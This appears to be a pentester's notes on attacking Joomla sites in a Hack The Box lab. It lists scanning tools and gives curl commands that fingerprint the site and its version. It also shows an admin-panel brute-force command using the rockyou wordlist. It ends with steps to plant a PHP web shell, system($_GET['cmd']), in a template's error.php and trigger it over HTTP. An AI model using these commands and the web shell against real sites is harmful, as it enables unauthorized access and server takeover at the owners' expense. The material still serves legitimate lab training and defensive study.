Joomla

Tools

https://github.com/droope/droopescan

https://github.com/OWASP/joomscan

https://github.com/ajnik/joomla-bruteforce

Resources

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla

Discovery/Footprinting

#Verify if Joomla is installed
Intrusionz3r0@htb[/htb]$ curl -s http://dev.inlanefreight.local/ | grep Joomla

#Check the robots.txt
Intrusionz3r0@htb[/htb]$ curl -s 'http://app.inlanefreight.local/robots.txt'

#Check the Joomla version through Readme.txt
Intrusionz3r0@htb[/htb]$ curl -s http://dev.inlanefreight.local/README.txt | head -n 5

#Fingerprint the version from files
#In /administrator/manifests/files/joomla.xml you can see the version.
#In /language/en-GB/en-GB.xml you can get the version of Joomla.
#In plugins/system/cache/cache.xml you can see an approximate version.
Intrusionz3r0@htb[/htb]$ curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

#Run joomlascan
Intrusionz3r0@htb[/htb]$ python2.7 joomlascan.py -u http://dev.inlanefreight.local

#Joomla Bruteforce agains the admin panel
Intrusionz3r0@htb[/htb]$  sudo python3 joomla-brute.py -u http://app.inlanefreight.local/ -w /usr/share/wordlists/rockyou.txt -usr admin

Remote Command Execution

If you managed to get admin credentials you can RCE inside of it by adding a snippet of PHP code to gain RCE. We can do this by customizing a template.

1. Click on Templates on the bottom left under Configuration to pull up the templates menu.

2. Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.

3. Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:

   1. system($_GET['cmd']);

4. Save & Close

5. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id